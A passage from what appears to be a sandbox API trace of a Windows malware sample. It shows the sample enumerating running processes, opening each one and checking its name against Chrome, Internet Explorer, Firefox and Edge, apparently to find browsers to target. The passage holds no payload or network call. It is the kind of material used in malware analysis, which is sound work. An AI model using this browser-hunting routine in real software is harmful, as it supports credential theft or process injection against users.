	[0251.686] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.686] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.687] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa328
	[0251.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.688] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.688] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.689] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.689] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa32c
	[0251.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.690] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.691] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.692] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.692] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa330
	[0251.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.693] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.693] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.694] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.694] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0251.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa334
	[0251.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.696] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0251.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.696] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.697] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0251.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.697] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa338
	[0251.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.699] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.699] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.699] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.700] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0251.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa33c
	[0251.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.701] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.701] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.702] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.702] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa340
	[0251.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.703] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.704] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa344
	[0251.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.707] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.707] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.708] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa348
	[0251.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.709] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.710] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.710] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.711] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0251.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa34c
	[0251.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.712] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0251.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.712] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.712] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0251.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.713] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0251.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa350
	[0251.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.714] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.714] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.714] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.715] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0251.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa354
	[0251.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.716] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0251.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.716] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.716] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0251.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.717] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0251.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0251.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0251.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa358
	[0251.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.718] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0251.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.719] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.720] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0251.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.720] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0251.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa35c
	[0251.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.722] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0251.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.722] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.723] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0251.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.723] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0251.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa360
	[0251.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.724] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0251.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.725] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.725] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0251.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.725] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0251.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa364
	[0251.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.727] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0251.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.727] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.727] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0251.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.728] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0251.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa368
	[0251.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.729] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0251.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.730] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.730] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0251.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.731] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0251.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa36c
	[0251.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.732] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0251.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.732] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.732] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0251.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.733] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0251.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa370
	[0251.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.734] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0251.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.734] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.735] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0251.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.735] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0251.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa374
	[0251.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.737] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0251.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.737] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.738] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0251.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.742] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0251.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa378
	[0251.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.743] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0251.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.743] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.743] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0251.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.744] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0251.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa37c
	[0251.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.745] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0251.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.745] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.745] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0251.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.746] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0251.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa380
	[0251.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.747] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0251.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.747] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.748] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0251.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.748] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0251.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa384
	[0251.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.750] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0251.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.750] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.751] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0251.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
